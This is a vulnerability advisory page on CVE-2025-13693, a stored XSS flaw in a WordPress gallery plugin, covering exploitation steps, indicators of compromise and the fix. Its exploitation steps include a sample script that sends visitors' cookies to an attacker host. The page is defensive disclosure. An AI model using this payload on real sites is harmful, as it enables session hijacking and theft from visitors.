CVE-2025-13693: 
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-13693 is a Stored Cross-Site Scripting (XSS) vulnerability in the Image Photo Gallery Final Tiles Grid plugin for WordPress, developed by WPChill (formerly Macho Themes). The flaw exists in all versions up to and including 3.6.8, where the 'Custom scripts' setting lacks sufficient input sanitization and output escaping. Authenticated attackers with Author-level access or higher can inject arbitrary web scripts that execute in the browsers of any user visiting an affected page. It was published on December 21, 2025, and carries a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, Red Hat CVE).

Technical details

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically in the plugin's gallery-class.php file where user-supplied content from the 'Custom scripts' setting is stored and later rendered without proper sanitization or escaping (Wordfence, WordPress Trac). The attack vector is network-based with low attack complexity, requiring only low privileges (Author role) and no user interaction beyond the victim visiting an injected page. The scope is changed, meaning the injected script executes in the context of other users' browsers rather than the attacker's session. A patch changeset is publicly visible in the WordPress plugin repository (WordPress Changeset).

Impact

Successful exploitation allows an authenticated attacker with Author-level access to persistently inject malicious JavaScript into WordPress pages, which executes in the browsers of all subsequent visitors. This can lead to session cookie theft, credential harvesting, redirection to malicious sites, defacement, or delivery of drive-by malware to site visitors. While availability is not directly impacted, confidentiality and integrity are both affected at a low-to-moderate level across the changed scope of all site visitors (Wordfence, Red Hat CVE).

Exploitability

No public exploit code or active in-the-wild exploitation has been reported for CVE-2025-13693 as of the available data. The EPSS score is approximately 0.03%, indicating a very low probability of exploitation in the near term (Feedly). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires at minimum an Author-level WordPress account, which limits the attack surface compared to unauthenticated vulnerabilities.

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the Image Photo Gallery Final Tiles Grid plugin (versions ≤ 3.6.8) using tools like WPScan or by inspecting page source for plugin fingerprints.
  2. Obtain Author-level access: Register or compromise an account with at least Author-level privileges on the target WordPress site.
  3. Navigate to plugin settings: Log in and access the Final Tiles Grid gallery plugin settings, specifically the 'Custom scripts' field within the gallery configuration.
  4. Inject malicious payload: Enter a JavaScript payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into the 'Custom scripts' field and save the settings.
  5. Trigger execution: The injected script is stored in the database and rendered unsanitized whenever any user visits a page containing the affected gallery, executing the attacker's code in the victim's browser (Wordfence, WordPress Trac).

Indicators of compromise

  • Logs: WordPress admin audit logs showing modification of the Final Tiles Grid plugin's 'Custom scripts' setting by an Author-level or higher account, especially if unexpected.
  • File System / Database: Presence of <script> tags or JavaScript event handlers (e.g., onerror, onload) stored in the wp_options or gallery-related database tables associated with the plugin.
  • Network: Outbound requests from site visitors' browsers to unfamiliar external domains shortly after visiting pages containing the Final Tiles Grid gallery (indicative of script-based data exfiltration or redirection).
  • Browser/Client: Unexpected redirects, pop-ups, or resource loads originating from pages hosting the gallery plugin, visible in browser developer tools or proxy logs.

Mitigation and workarounds

Site administrators should update the Image Photo Gallery Final Tiles Grid plugin to version 3.6.9 or later, which contains the fix for insufficient input sanitization and output escaping in the 'Custom scripts' setting (Wordfence, WordPress Changeset). As a temporary workaround, restrict Author-level user permissions or disable the 'Custom scripts' feature until the plugin is updated. Implementing a Web Application Firewall (WAF) with XSS filtering rules can provide an additional layer of defense.

Community reactions

The vulnerability was reported and disclosed by Wordfence, which assigned the CVE and published the advisory on December 21, 2025. No notable independent researcher commentary or significant media coverage beyond standard vulnerability aggregator listings (VulDB, Vulners, Tenable, ENISA EUVD) has been identified (Wordfence, ENISA EUVD).

Additional resources


Source: This report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-86850MEDIUM6.5
  • sku-error-fixer-for-woocommerce
NoNoOct 06, 2026
CVE-2026-88931MEDIUM5.3
  • social-web-suite
NoNoOct 06, 2026
CVE-2026-87841MEDIUM5.3
  • unitechpay-paiements-mobile-money
NoNoOct 06, 2026
CVE-2026-92990MEDIUM5.3
  • sendpress
NoNoOct 06, 2026
CVE-2026-92989MEDIUM4.3
  • sendpress
NoNoOct 06, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management